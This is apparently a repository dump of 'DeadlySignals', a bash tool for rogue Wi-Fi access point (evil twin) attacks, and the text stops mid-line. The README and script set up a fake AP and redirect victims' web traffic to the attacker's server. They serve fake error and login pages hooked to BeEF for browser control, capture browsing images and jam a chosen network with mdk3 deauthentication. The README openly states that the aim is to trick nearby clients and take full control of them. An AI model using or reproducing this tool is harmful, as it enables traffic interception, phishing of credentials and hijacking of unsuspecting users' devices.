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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DeadlySignals 2 | 3 | ![Tool image](http://oi67.tinypic.com/2h5k8e1.jpg) 4 | 5 | # Instractions 6 | This tool creates a fake access point that provide internet connection to trick the clients arround and have full control with that fake AP and the connected clients 7 | 8 | # Discalimer 9 | I'm not responsable for using this tool badly,make it useful :) 10 | 11 | # Notice 12 | This is the beta version so you may face many problems while using it , if you got any bugs you should inform me in issues section in github to fix it for you. 13 | 14 | # Installation 15 | first go to the deadlysignals directory in terminal then give execution permission to install file 16 | ```bash 17 | chmod 700 install 18 | ``` 19 | then execute install file as root 20 | ```bash 21 | sudo ./install 22 | ``` 23 | after it's done execute deadlysignals 24 | ```bash 25 | sudo ./deadlysignals 26 | ``` 27 | # Usage 28 | 1) You need two network interface connected to the internet ,one for broadcasting the wifi signal and one for providing the internet access 29 | 30 | 2) The network device that will broadcast the signal must supports monitor mode 31 | 32 | 3) This tool is tested on TP-LINK TL-WN722N so if had an error with your network card just inform me in github issues section. 33 | 34 | 4) It's easy to use for everyone and it doesn't need a long explination. 35 | 36 | Hope you like the tool and have a nice day :D 37 | -------------------------------------------------------------------------------- /deadlysignals: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ## Colors ## 4 | Black='\033[0;30m' # Black 5 | Red='\033[0;31m' # Red 6 | Green='\033[0;32m' # Green 7 | Yellow='\033[0;33m' # Yellow 8 | Blue='\033[0;34m' # Blue 9 | Purple='\033[0;35m' # Purple 10 | Cyan='\033[0;36m' # Cyan 11 | White='\033[0;37m' # White 12 | Color_Off='\033[0m' # Text Reset 13 | # Bold 14 | BBlack='\033[1;30m' # Black 15 | BRed='\033[1;31m' # Red 16 | BGreen='\033[1;32m' # Green 17 | BYellow='\033[1;33m' # Yellow 18 | BBlue='\033[1;34m' # Blue 19 | BPurple='\033[1;35m' # Purple 20 | BCyan='\033[1;36m' # Cyan 21 | BWhite='\033[1;37m' # White 22 | 23 | #source devices 24 | function banner { 25 | echo -e """ 26 | ${Green}.- _ _ -. 27 | / / \ ) 28 | ( ( (. (${White}-o-${Green}) .) ) ) 29 | \ \_ . ${White}-+-${Green} . _/ / 30 | .- ${White}-+-${Green} -. 31 | ${Red} ___ _ _ ${White}-+-${Yellow} __ _ _ 32 | ${Red} / \___ __ _ __| | |_ _ ${White}_|_${Yellow} / _(_) __ _ _ __ __ _| |___ 33 | ${Red} / /\ / _ \/ _ |/ _ | | | | | ${White}|/|${Yellow} \ \| |/ _ | _ \ / _ | / __| 34 | ${Red} / /_// __/ (_| | (_| | | |_| | ${White}|\|${Yellow} _\ \ | (_| | | | | (_| | \__ | 35 | ${Red}/___ / \___|\__ _|\__ _|_|\__ | ${White}|/|${Yellow} \__/_|\__ |_| |_|\__ _|_|___/ 36 | ${Red} |___/ ${Yellow} |___/ 37 | ${Yellow} Fake AccessPoint Attack ${Blue}Version 4.0 Beta ${White}Created By${Red}:${Yellow}0V3rK!113R 38 | 39 | ${Color_Off}""" 40 | } 41 | 42 | function header { 43 | 44 | printf "\n${Purple}[${Red}Deadly${Purple}((${Yellow}-${Blue}@${Yellow}-${Purple}))${Red}Signals${Purple}]${White}:${Color_Off}" 45 | } 46 | 47 | function normal_interrupt { 48 | 49 | echo -e "\n[${Red}x$Color_Off]Shutting down" 50 | exit $? 51 | } 52 | 53 | function hard_interrupt { 54 | 55 | if ps -A | grep -q mdk3; then 56 | echo -e "\n[${Red}-${Color_Off}]Stop jamming client wifi.." 57 | killall mdk3 &> /dev/null 58 | sleep 3 59 | fi 60 | 61 | echo -e "\n[${Red}x$Color_Off]Turnoff broadcast" 62 | killall hostapd &> /dev/null 63 | sleep 2 64 | 65 | echo -e "[${Red}x$Color_Off]Removing gateway" 66 | ip addr del 10.0.0.1/24 dev $MON_INTERFACE 67 | sleep 3 68 | 69 | echo -e "[${Red}x$Color_Off]Kill monitor mode" 70 | MON_INTERFACE_DOWN=$(ifconfig $MON_INTERFACE down > /dev/null) 71 | STOP_MONITOR=$(airmon-ng stop $MON_INTERFACE > /dev/null) 72 | sleep 2 73 | 74 | echo -e "[${Red}x$Color_Off]turnning off all interfaces" 75 | BROADCAST_INTERFACE_DOWN=$(ifconfig $BROADCAST_INTERFACE down > /dev/null) 76 | ONLINE_INTERFACE_DOWN=$(ifconfig $ONLINE_INTERFACE down > /dev/null) 77 | 78 | #echo -e "[${Red}x${Color_Off}]Turnoff the broadcasting AP" 79 | #KILL_SIGNAL=$(ip addr del 10.0.0.1/24 brd + dev ap0) 80 | #DELETE_INTERFACE=$(ip link delete ap0 type dummy) 81 | #DELETE_MOD=$(rmmod dummy) 82 | 83 | echo -e "[${Red}x$Color_Off]Kill fuser!" 84 | KILL_FUSER=$(fuser -k 53/tcp 2> /dev/null) 85 | 86 | echo -e "[${Red}x$Color_Off]Restarting the network" 87 | if [[ $SYSTEM_DISTRO == "Arch" ]]; then 88 | ALL_INTERFACE_RESET=$(systemctl restart NetworkManager > /dev/null) 89 | else 90 | ALL_INTERFACE_RESET=$(systemctl restart network-manager > /dev/null) 91 | fi 92 | 93 | echo -e "[${Red}x$Color_Off]Turnoff network redirection" 94 | REDIRECTION_OFF=$(echo 0 > /proc/sys/net/ipv4/ip_forward) 95 | 96 | RULES_KILL=$(iptables -L FORWARD | grep REJECT | grep tcp > /dev/null) 97 | if [ $? = 0 ] 98 | then 99 | echo -e "[${Red}x${Color_Off}]Flushing ip rules" 100 | FLUSH_RULE_1=$(iptables -D FORWARD -p tcp -j REJECT) 101 | FLUSH_RULE_2=$(iptables -D FORWARD -p icmp -j REJECT) 102 | fi 103 | echo -e "[${Red}x${Color_Off}]Disable the server" 104 | if [ -d /etc/apache2/ssl ] 105 | then rm -r /etc/apache2/ssl 106 | fi 107 | a2dismod ssl > /dev/null 108 | /etc/init.d/apache2 stop 109 | 110 | 111 | echo -e "[${Red}x${Color_Off}]Clearing the files" 112 | rm .* 2> /dev/null 113 | rm files/.* 2> /dev/null 114 | 115 | killall hostapd 2> /dev/null 116 | killall dhcpd 2> /dev/null 117 | 118 | 119 | 120 | echo -e "[${Blue}?${Color_Off}]Do you want to flush all iptables?(Y/N) ${Green}[Recommended]${Color_Off}" 121 | header 122 | read flushing_tables 123 | if [ $flushing_tables = "y" ] || [ $flushing_tables = "Y" ] 124 | then echo -e "[${Green}+${Color_Off}]Flushing iptables.." 125 | iptables -t nat -F 126 | iptables -F 127 | elif [ $flushing_tables = "n" ] || [ $flushing_tables = "N" ] 128 | then echo -e "${Green}OK!${Color_Off}" 129 | 130 | else 131 | echo -e "[${Green}+${Color_Off}]Flushing iptables.." 132 | iptables -t nat -F 133 | iptables -F 134 | fi 135 | echo -e "[${Red}x${Color_Off}]Exit!" 136 | 137 | if [ $? != 0 ] 138 | then echo -e "${Red}[X]Critical:Something goes wrong while stopping the broadcasted wifi!!" 139 | exit 1 140 | 141 | else 142 | exit 0 143 | fi 144 | 145 | } 146 | 147 | #===============================CHECKING AREA====================================# 148 | 149 | function check_root { 150 | 151 | if [ $USER != root ] 152 | then echo -e "$Red[x]You don't have root user privilages${Color_Off}" 153 | exit 1 154 | else 155 | clear 156 | fi 157 | } 158 | 159 | ##Complete this function to check for all files## 160 | 161 | function check_files { 162 | files=( "iptables" "dnsmasq" "airmon-ng" "airbase-ng" "macchanger" "hostapd" "mdk3" "openssl" "reaver" "beef" "xterm" "wvdial" "iw" ) 163 | 164 | for i in ${files[@]};do 165 | echo -e "[+]Check $i";which $i &> /dev/null 166 | if [ $? != 0 ];then echo -e "[${Red}x${Color_Off}]Missing Tools!";exit 1;fi 167 | sleep 0.5 168 | done 169 | 170 | echo -e "[${Yellow}+${Color_Off}]Starting" 171 | sleep 1 172 | clear 173 | } 174 | 175 | function check_system { 176 | banner 177 | echo -e "[${Blue}*${Color_Off}]Check Comptaiblity.." 178 | if [ -d /etc/apt/ ] 179 | then SYSTEM_DISTRO="Debian" 180 | elif [ -d /etc/pacman.d/ ] 181 | then SYSTEM_DISTRO="Arch" 182 | else 183 | echo -e "[${Red}x${Color_Off}]This distro is not supported yet!" 184 | echo -e "[${Yellow}!${Color_Off}]you need to run it on Debian or Arch distro" 185 | exit 1 186 | fi 187 | } 188 | 189 | function check_nic_support { 190 | echo -e "[${Blue}*${Color_Off}]Check NIC Support AP" 191 | NIC_SUPPORT=$(iw list | grep "Device supports AP scan") 192 | if [ $? != 0 ] 193 | then echo -e "[${Red}x${Color_Off}]Your Wireless card doesn't met the requirements to act as AccessPoint" 194 | exit 1 195 | fi 196 | } 197 | 198 | 199 | function check_firewall { 200 | echo -e "[${BBlue}*${Color_Off}]check_firewall" 201 | UFW=$(iptables --list-rules | grep ufw) 202 | if [ $? = 0 ] 203 | then echo -e "[${Yellow}!${Color_Off}]Looks like your firewall is active" 204 | echo -e "${Green}\nFirewall may interfere with this tool and prevent the devices from make connection to your AP" 205 | echo -e "${Green}It's very recommended to disable your firewall before using this tool" 206 | echo -e "${Cyan}Disable your firewall then restart your machine and start to use the tool${Color_Off}" 207 | printf "\nPress Enter To Continue.." 208 | read pass 209 | fi 210 | } 211 | 212 | #======================================================================================================# 213 | 214 | function Informations { 215 | 216 | echo -e "[$Blue?$Color_Off]Enter AccessPoint name " 217 | header 218 | read APNAME 219 | if [ -z $APNAME ] 220 | then echo -e "${Red}[x]Cannot be empty!${Color_Off}" 221 | exit 1 222 | fi 223 | echo $APNAME > .signalname 224 | echo -e "\n[$Blue?$Color_Off]Choose an option: ${Green}[default = 1]${Color_Off}\n" 225 | echo -e "[${Yellow}1${Color_Off}]Visible" 226 | echo -e "[${Yellow}2${Color_Off}]Hidden" 227 | header 228 | read APOPTIONS 229 | if [ $APOPTIONS ]; then 230 | echo -e "\n[$Blue?$Color_Off]Choose wifi encryption type ${Green}[default = 1]${Color_Off}\n" 231 | echo -e "[${Yellow}1${Color_Off}]Open - No encryption" 232 | echo -e "[${Yellow}2${Color_Off}]WPA" 233 | echo -e "[${Yellow}3${Color_Off}]WPA2" 234 | echo -e "[${Yellow}4${Color_Off}]WPA/WPA2" 235 | echo -e "[${Yellow}5${Color_Off}]WEP" 236 | header 237 | read AP_ENC 238 | if [ $AP_ENC -eq 2 ] || [ $AP_ENC -eq 3 ] || [ $AP_ENC -eq 4 ]; then 239 | echo -e "\n[$Blue?$Color_Off]Enter password key\n" 240 | header 241 | read WPA_PASS 242 | fi 243 | fi 244 | 245 | echo -e "[${Blue}?${Color_Off}]Choose connection type:\n" 246 | echo -e "[${Yellow}1${Color_Off}]Online" 247 | echo -e "[${Yellow}2${Color_Off}]Offline" 248 | header 249 | read CONNECTION_TYPE 250 | 251 | NIC=$(ip link show | awk '{print $2}' | tr -d ':' | grep wl) 252 | for i in $NIC;do echo "[*]$i";done 253 | 254 | ## have to check if input correct ## 255 | 256 | echo -e "\n[${Blue}?${Color_Off}]Which interface you will use to broadcast your wifi signal?" 257 | header 258 | read BROADCAST_INTERFACE 259 | 260 | printf "[${Blue}*${Color_Off}]Check NL80211 ${Red}" 261 | 262 | WIFI_CARD_KERNEL_MODULE=$(ls /sys/class/net/$BROADCAST_INTERFACE/device/driver/module/drivers/ | sed 's/.*://') 263 | NL_SUPPORT=$(modinfo $WIFI_CARD_KERNEL_MODULE | grep 'depend' | grep 'mac80211' > /dev/null) 264 | 265 | if [[ $? == 0 ]];then printf "${Green}.. OK${Color_Off}\n" 266 | 267 | else printf "${Red}.. NOT SUPPORTED";echo -e "\n${Color_Off}[${Red}x${Color_Off}]Your wireless card doesn't met the requirements to act as AccessPoint";exit 1 268 | 269 | fi 270 | if [ $CONNECTION_TYPE = 1 ];then 271 | 272 | if [ $(ip link show | awk '{print $2}' | tr -d ':' | grep wl | wc -l) -lt 2 ];then 273 | echo -e "[${Red}x${Color_Off}]Error:only one network interface detected!" 274 | echo -e "[${Yellow}!${Color_Off}]You should have at least 2 network cards to broadcast the signal and provide the internet connection" 275 | echo -e "[${Yellow}!${Color_Off}]Make sure that the both network interfaces are connected to the internet to make it easy to detect them" 276 | exit 1 277 | fi 278 | 279 | echo -e "\n[${Blue}?${Color_Off}]Which interface you will use to provide the internet connection?" 280 | header 281 | read ONLINE_INTERFACE 282 | 283 | ## Check if the online interface is online ## 284 | 285 | ONLINE_INTERFACE_CHECK=$(more /sys/class/net/$ONLINE_INTERFACE/operstate) 286 | if [ $ONLINE_INTERFACE_CHECK != up ];then 287 | echo -e "\n[${Red}x${Color_Off}]Make sure that the interface that will provide internet connection is online!";exit 1 288 | fi 289 | 290 | fi 291 | 292 | if [ $CONNECTION_TYPE = 2 ];then echo -e "[${Yellow}!${Color_Off}]Skip online detection";fi 293 | 294 | if [ -d /sys/class/net/$BROADCAST_INTERFACE/device/driver/module/drivers/ ] 295 | then NETWORK_CARD=$(ls /sys/class/net/$BROADCAST_INTERFACE/device/driver/module/drivers/) 296 | 297 | else 298 | echo -e "[${Red}x${Color_Off}]Something wrong with getting interface or your Wireless card!" 299 | exit 1 300 | fi 301 | 302 | 303 | echo -e "\n[$Green+$Color_Off]AccessPoint name : $APNAME" 304 | echo -e "[$Green+$Color_Off]Wireless interface : $BROADCAST_INTERFACE" 305 | echo -e "[$Green+$Color_Off]Wireless Network Card : $NETWORK_CARD" 306 | echo -e "[${Green}+$Color_Off]System Distrbution : $SYSTEM_DISTRO" 307 | 308 | } 309 | function dhcp_configuration { 310 | 311 | echo """ddns-update-style none; 312 | ignore client-updates; 313 | authoritative; 314 | option local-wpad code 252 = text; 315 | subnet 316 | 10.0.0.0 netmask 255.255.255.0 { 317 | 318 | ##--Default gateway--## 319 | option routers 320 | 10.0.0.1; 321 | 322 | ##--Netmask--## 323 | option subnet-mask 324 | 255.255.255.0; 325 | 326 | ##--Broadcast Address--## 327 | option broadcast-address 328 | 10.0.0.255; 329 | 330 | ##--Domain name servers--## 331 | option domain-name-servers 332 | 10.0.0.1, 1.1.1.1, 1.1.1.0; 333 | option time-offset 334 | 0; 335 | 336 | ##--range--## 337 | range 10.0.0.3 10.0.0.100; 338 | default-lease-time 1209600; 339 | max-lease-time 1814400; 340 | }""" > .dhcpd.conf 341 | dhcpd -cf .dhcpd.conf $MON_INTERFACE 2> /dev/null & 342 | } 343 | 344 | function ap_conf { 345 | echo """interface=$MON_INTERFACE 346 | utf8_ssid=1 347 | ssid=$APNAME 348 | driver=nl80211 349 | hw_mode=g 350 | channel=6 351 | macaddr_acl=0 352 | auth_algs=1""" > /etc/hostapd/hostapd.conf 353 | if [[ AP_ENC -eq 2 ]]; then 354 | echo """wpa=1 355 | wpa_passphrase=$WPA_PASS 356 | wpa_key_mgmt=WPA-PSK 357 | wpa_pairwise=TKIP""" >> /etc/hostapd/hostapd.conf 358 | elif [[ AP_ENC -eq 3 ]]; then 359 | echo """wpa=2 360 | wpa_passphrase=$WPA_PASS 361 | rsn_pairwise=CCMP""" >> /etc/hostapd/hostapd.conf 362 | elif [[ AP_ENC -eq 4 ]]; then 363 | echo """wpa=3 364 | wpa_passphrase=$WPA_PASS 365 | wpa_key_mgmt=WPA-PSK 366 | rsn_pairwise=CCMP""" >> /etc/hostapd/hostapd.conf 367 | elif [[ AP_ENC -eq 5 ]]; then 368 | echo """wep_default_key=0 369 | wep_key0=qwert""" >> /etc/hostapd/hostapd.conf 370 | fi 371 | if [[ $APOPTIONS -eq 2 ]]; then echo "ignore_broadcast_ssid=1" >> /etc/hostapd/hostapd.conf;fi 372 | } 373 | 374 | function monitor_mode { 375 | 376 | START_MONITOR=$(airmon-ng start $BROADCAST_INTERFACE > /dev/null) 377 | 378 | ## FIXME: Can't check if the interface is support the monitor mode or not [always == 0] ## 379 | if [ $? != 0 ] 380 | then 381 | echo -e "[$Red x $Color_Off]Error:Can't go to monitor mode!" 382 | echo -e "[$Yellow!$Color_Off]Make sure that your Wireless network card support monitor mode!" 383 | exit 1 384 | fi 385 | } 386 | ################BROADCAST))))))))))))) 387 | function broadcast_ap { 388 | 389 | MON_INTERFACE="$(ls /sys/class/net/ | grep mon)" 390 | 391 | if [ $? != 0 ] 392 | then 393 | echo -e "[$Red x $Color_Off]Error:Can't go to monitor mode!" 394 | echo -e "[$Yellow!$Color_Off]Make sure that your Wireless network card support monitor mode!" 395 | exit 1 396 | fi 397 | 398 | if [ $APOPTIONS ]; then 399 | ap_conf 400 | sleep 3 401 | hostapd -B /etc/hostapd/hostapd.conf > /dev/null & 402 | fi 403 | 404 | } 405 | 406 | function set_ips { 407 | 408 | IP_NETWORK="10.0.0.0" 409 | IP_START="10.0.0.10" 410 | IP_END="10.0.0.250" 411 | NETMASK="255.255.255.0" 412 | GATEWAY="10.0.0.1" 413 | 414 | ip a a $GATEWAY/24 dev $MON_INTERFACE 415 | if [ $? != 0 ] 416 | then echo -e "[${Red}x${Color_Off}]Can't set $MON_INTERFACE interface!" 417 | fi 418 | route add -net $IP_NETWORK netmask $NETMASK gw $GATEWAY 419 | echo 1 > /proc/sys/net/ipv4/ip_forward 420 | iptables -P FORWARD ACCEPT 421 | if [ $CONNECTION_TYPE = 1 ];then iptables -t nat -A POSTROUTING -o $ONLINE_INTERFACE -j MASQUERADE;fi 422 | } 423 | #===================================>ATTACK LIST 424 | function redirecting_start { 425 | HOST_IP=($(ip route get 1.1.1.1 | awk '{print $NF; exit }')) 426 | echo -e "[${Blue}*${Color_Off}]Redirecting http requests" 427 | iptables --append FORWARD --in-interface $MON_INTERFACE -j ACCEPT 428 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j DNAT --to-destination $HOST_IP:80 429 | echo -e "[${Blue}*${Color_Off}]Redirecting https requests" 430 | iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j DNAT --to-destination $HOST_IP:443 431 | 432 | CHECK_SSL_REDIRECTING=$(iptables --list-rules | grep 443) 433 | if [ $? != 0 ] 434 | then iptables -A INPUT -p tcp --source-port 443 -j ACCEPT 435 | iptables -A OUTPUT -p tcp --destination-port 443 -j ACCEPT 436 | fi 437 | 438 | CHECK_MASQUERADE=$(iptables -t nat --list-rules | grep MASQUERADE) 439 | if [ $? != 0 ] 440 | then iptables -t nat -A POSTROUTING -j MASQUERADE 441 | fi 442 | 443 | a2enmod ssl > /dev/null 444 | if [ -d /etc/apache2/ssl ] 445 | then rm -r /etc/apache2/ssl/* 446 | openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /etc/apache2/ssl/deadly.signals.key -out /etc/apache2/ssl/deadly.signals.crt 2> /dev/null 447 | chmod 700 /etc/apache2/ssl/* 448 | else 449 | mkdir /etc/apache2/ssl 450 | openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /etc/apache2/ssl/deadly.signals.key -out /etc/apache2/ssl/deadly.signals.crt 2> /dev/null 451 | chmod 700 /etc/apache2/ssl/* 452 | fi 453 | 454 | APACHE_CHECK=($(sudo /etc/init.d/apache2 status 2> /dev/null)) 455 | 456 | if [ $? != 0 ] 457 | 458 | then echo -e "[${Blue}?${Color_Off}]Start the Apache server? (Y/N)" 459 | header 460 | read APACHE_START 461 | if [ $APACHE_START = "y" ] || [ $APACHE_START = "Y" ]|| [ -z $APACHE_START ] 462 | then /etc/init.d/apache2 restart 463 | else 464 | echo -e "${Green}OK${Color_Off}!" 465 | fi 466 | else 467 | echo -e "[${Yellow}!${Color_Off}]Apache server is enabled" 468 | fi 469 | 470 | if [ $? != 0 ] 471 | then echo -e "[${Red}x${Color_Off}]Faild to start apache server!" 472 | echo -e "[${Red}!${Color_Off}]Fall back.." 473 | iptables -D FORWARD --in-interface $MON_INTERFACE -j ACCEPT 474 | iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j DNAT --to-destination $HOST_IP:80 475 | iptables -t nat -D PREROUTING -p tcp --destination-port 443 -j DNAT --to-destination $HOST_IP:443 476 | iptables -D INPUT -p tcp --source-port 443 -j ACCEPT 477 | iptables -D OUTPUT -p tcp --destination-port 443 -j ACCEPT 478 | iptables -t nat -D POSTROUTING -j MASQUERADE 479 | a2dismod ssl > /dev/null 480 | rm -r /etc/apache2/ssl 481 | fi 482 | echo -e "[${Green}+${Color_Off}]Process done successfully" 483 | echo -e "[${Yellow}!${Color_Off}]place your index.html file to /var/www/html" 484 | } 485 | 486 | function redirecting_stop { 487 | HOST_IP=($(ip route get 1.1.1.1 | awk '{print $NF; exit }')) 488 | echo -e "[${Red}*${Color_Off}]Reset the redirection rules.." 489 | iptables -D FORWARD --in-interface $MON_INTERFACE -j ACCEPT 2> /dev/null 490 | iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j DNAT --to-destination $HOST_IP:80 2> /dev/null 491 | iptables -t nat -D PREROUTING -p tcp --destination-port 443 -j DNAT --to-destination $HOST_IP:443 2> /dev/null 492 | iptables -D INPUT -p tcp --source-port 443 -j ACCEPT 2> /dev/null 493 | iptables -D OUTPUT -p tcp --destination-port 443 -j ACCEPT 2> /dev/null 494 | iptables -t nat -D POSTROUTING -j MASQUERADE 2> /dev/null 495 | a2dismod ssl > /dev/null 496 | rm -r /etc/apache2/ssl/ 497 | 498 | echo -e "[${Red}?${Color_Off}]Stop the Apache server? (Y/N)" 499 | header 500 | read APACHE_STOP 501 | if [ $APACHE_STOP = "y" ] || [ $APACHE_STOP = "Y" ] || [ -z $APACHE_STOP ] 502 | then /etc/init.d/apache2 stop 503 | else 504 | echo -e "${Red}OK${Color_Off}!" 505 | fi 506 | } 507 | 508 | function infected_index { 509 | echo -e "[${Blue}*${Color_Off}]${Green}This will create an index web page with malicious code to control the target \n${Cyan}it's highly recommended to use Redirecting websites option to redirect that index file to the target\n${Color_Off}" 510 | echo -e "[${Yellow}1${Color_Off}]Create default page" 511 | echo -e "[${Yellow}2${Color_Off}]Create custom page" 512 | header 513 | read INDEX_CREATION 514 | 515 | if [ $INDEX_CREATION = 1 ] || [ -z $INDEX_CREATION ] 516 | then 517 | echo -e "\n[${Yellow}1${Color_Off}]Create fake error page" 518 | echo -e "[${Yellow}2${Color_Off}]Create fake login page" 519 | header 520 | read INDEX_TYPE 521 | 522 | if [ $INDEX_TYPE = 1 ] || [ -z $INDEX_TYPE ] 523 | then 524 | more files/error_page/index.html | grep "" > /dev/null 525 | if [ $? != 0 ] 526 | then sed -i "6i " files/error_page/index.html 527 | else 528 | sed -i "6d" files/error_page/index.html 529 | sed -i "6i " files/error_page/index.html 530 | fi 531 | 532 | cp files/error_page/index.html /var/www/html/ 533 | cp files/error_page/.error.png /var/www/html/ 534 | echo -e "[${Green}+${Color_Off}]index files has been created successfully" 535 | echo -e "[${Yellow}!${Color_Off}]You can edit index file at ${Green}/var/www/html/index.html ${Color_Off}" 536 | 537 | echo -e "[${Blue}?${Color_Off}]Start beef-xss UI panel? (Y/N)" 538 | header 539 | read BEEF_STARTING 540 | 541 | if [ $BEEF_STARTING = y ] || [ $BEEF_STARTING = Y ] || [ -z $BEEF_STARTING ] 542 | then echo -e "[${Green}+${Color_Off}]Starting beef UI.." 543 | beef-xss > /dev/null & 544 | sleep 12 545 | else 546 | echo -e "${Red}OK${Color_Off}!" 547 | 548 | fi 549 | 550 | elif [ $INDEX_TYPE = 2 ] 551 | then 552 | more files/error_page/index.html | grep "" > /dev/null 553 | if [ $? != 0 ] 554 | then 555 | sed -i "134i " files/login_page/index.html 556 | else 557 | sed -i "134d" files/login_page/index.html 558 | sed -i "134i " files/login_page/index.html 559 | 560 | fi 561 | 562 | cp files/login_page/index.html /var/www/html 563 | echo -e "[${Green}+${Color_Off}]index files has been created successfully" 564 | echo -e "[${Yellow}!${Color_Off}]You can edit index file at ${Green}/var/www/html/index.html ${Color_Off}" 565 | 566 | echo -e "[${Blue}?${Color_Off}]Start beef-xss panel? (Y/N)" 567 | header 568 | read BEEF_STARTING 569 | 570 | if [ $BEEF_STARTING = y ] || [ $BEEF_STARTING = Y ] || [ -z $BEEF_STARTING ] 571 | then echo -e "[${Green}+${Color_Off}]Starting beef-xss.." 572 | beef-xss > /dev/null & 573 | sleep 8 574 | else 575 | echo -e "${Red}OK${Color_Off}!" 576 | 577 | fi 578 | 579 | fi 580 | 581 | elif [ $INDEX_CREATION = 2 ] 582 | then echo -e "[${Blue}*${Color_Off}]Create your index.html and place this code inside it\n${Yellow}\n${Color_Off}then place the file in ${Green}/var/www/html/${Color_Off}\n" 583 | echo -e "[${Blue}?${Color_Off}]Start beef-xss panel? (Y/N)" 584 | header 585 | read BEEF_STARTING 586 | if [ $BEEF_STARTING = y ] || [ $BEEF_STARTING = Y ] || [ -z $BEEF_STARTING ] 587 | then echo -e "[${Green}+${Color_Off}]Starting beef-xss.." 588 | beef-xss > /dev/null & 589 | sleep 8 590 | else 591 | echo -e "${Red}OK${Color_Off}!" 592 | fi 593 | fi 594 | 595 | } 596 | 597 | function jamming_attack_start { 598 | 599 | 600 | echo -e "\n[${Blue}?${Color_Off}]Enter wifi BSSID" 601 | header 602 | read WIFI_BSSID 603 | while [[ -z WIFI_BSSID ]]; do 604 | echo -e "[${Red}x${Color_Off}]Invaild BSSID\n" 605 | echo -e "\n[${Blue}?${Color_Off}]Enter wifi BSSID" 606 | header 607 | read WIFI_BSSID 608 | done 609 | echo $WIFI_BSSID > .target_bssid 610 | 611 | echo -e "\n[${Blue}?${Color_Off}]Enter wifi channel" 612 | header 613 | read WIFI_CHANNEL 614 | 615 | while [[ -z WIFI_CHANNEL ]]; do 616 | echo -e "[${Red}x${Color_Off}]Invaild BSSID\n" 617 | echo -e "\n[${Blue}?${Color_Off}]Enter wifi channel" 618 | header 619 | read WIFI_CHANNEL 620 | done 621 | 622 | mdk3 $MON_INTERFACE d -b .target_bssid -c $WIFI_CHANNEL > /dev/null & 623 | 624 | if [ $? != 0 ] 625 | then echo -e "[${Red}x${Color_Off}]Something went wrong!" 626 | else 627 | echo -e "[${Green}+${Color_Off}]Jamming client begins!" 628 | fi 629 | 630 | 631 | } 632 | 633 | function jamming_attack_stop { 634 | 635 | if ps -A | grep -q mdk3; then 636 | echo -e "[${Red}-${Color_Off}]Stop jamming client wifi.." 637 | killall mdk3 &> /dev/null 638 | else 639 | echo -e "[${Red}x${Color_Off}]Jamming already stopped!" 640 | fi 641 | } 642 | 643 | function attack_options { 644 | HOST_IP=($(ip route get 1.1.1.1 | awk '{print $NF; exit }')) 645 | while [[ true ]]; do 646 | clear 647 | banner 648 | if iptables --table nat --list-rules | grep "POSTROUTING -o $ONLINE_INTERFACE" > /dev/null;then 649 | echo -e "\n${Green}●${Color_Off} Connection Status - Online\n" 650 | else 651 | echo -e "\n${Red}●${Color_Off} Connection Status - Offline\n" 652 | fi 653 | if ps -A | grep -q mdk3; then 654 | echo -e "${Green}(${BRed}*${Purple}/${BRed}*${Green})${Color_Off}Jamming is activated\n" 655 | fi 656 | echo -e "\n${Yellow}[${Red}1${Yellow}]${Color_Off}Get Browsing Images" 657 | echo -e "${Yellow}[${Red}2${Yellow}]${Color_Off}Make login required ${Red}[Still under developing]" 658 | echo -e "${Yellow}[${Red}3${Yellow}]${Color_Off}Redirecting websites ${Green}Start${Color_Off}" 659 | echo -e "${Yellow}[${Red}4${Yellow}]${Color_Off}Redirecting websites ${Red}Stop${Color_Off}" 660 | echo -e "${Yellow}[${Red}5${Yellow}]${Color_Off}Offline Connection" 661 | echo -e "${Yellow}[${Red}6${Yellow}]${Color_Off}Online Connection" 662 | echo -e "${Yellow}[${Red}7${Yellow}]${Color_Off}Show the connected devices" 663 | echo -e "${Yellow}[${Red}8${Yellow}]${Color_Off}Create infected web page" 664 | echo -e "${Yellow}[${Red}9${Yellow}]${Color_Off}Jamming targeted wifi ${Green}Start${Color_Off}" 665 | echo -e "${Yellow}[${Red}10${Yellow}]${Color_Off}Jamming targeted wifi ${Red}Stop${Color_Off}" 666 | echo -e "\n[${Yellow}!${Color_Off}]${Red}Press Ctrl+C to kill the broadcast of AP${Color_Off}" 667 | header 668 | read ATTACKOPTION 669 | if [ $ATTACKOPTION = 1 ] 670 | then echo -e "\n[${Green}+${Color_Off}]Get images.." 671 | driftnet -i $MON_INTERFACE 2> /dev/null & 672 | sleep 3 673 | 674 | elif [ $ATTACKOPTION = 2 ] 675 | then echo -e "\n[${Green}+${Color_Off}]Create login page.." 676 | ##TODO: put your code here ## 677 | 678 | elif [ $ATTACKOPTION = 3 ] 679 | then CHECK_SPOOFING=$(iptables --table nat --list-rules | grep $HOST_IP > /dev/null) 680 | if [ $? != 0 ] 681 | then echo -e "\n[${Green}+${Color_Off}]Redirecting.." 682 | redirecting_start 683 | sleep 4 684 | else 685 | echo -e "[${Red}x${Color_Off}]Redirecting already enabled" 686 | sleep 4 687 | fi 688 | 689 | elif [ $ATTACKOPTION = 4 ] 690 | then CHECK_SPOOFING=$(iptables --table nat --list-rules | grep $HOST_IP > /dev/null) 691 | if [ $? = 0 ] 692 | then redirecting_stop 693 | sleep 4 694 | else 695 | echo -e "[${Red}x${Color_Off}]Redirecting already disabled" 696 | sleep 3 697 | fi 698 | 699 | # Connection OFF # 700 | elif [ $ATTACKOPTION = 5 ] 701 | then 702 | iptables --table nat --list-rules | grep "POSTROUTING -o $ONLINE_INTERFACE" > /dev/null 703 | if [[ $? = 0 ]];then 704 | echo -e "\n[${Green}+${Color_Off}]Go Offline.." 705 | sleep 3 706 | if [[ $CONNECTION_TYPE = 1 ]];then 707 | iptables --table nat -D POSTROUTING -o $ONLINE_INTERFACE -j MASQUERADE 708 | else 709 | echo -e "\n[${Red}x${Color_Off}]Connection is already ${Red}OFF${Color_Off}";sleep 3 710 | fi 711 | fi 712 | 713 | elif [ $ATTACKOPTION = 6 ];then 714 | iptables --table nat 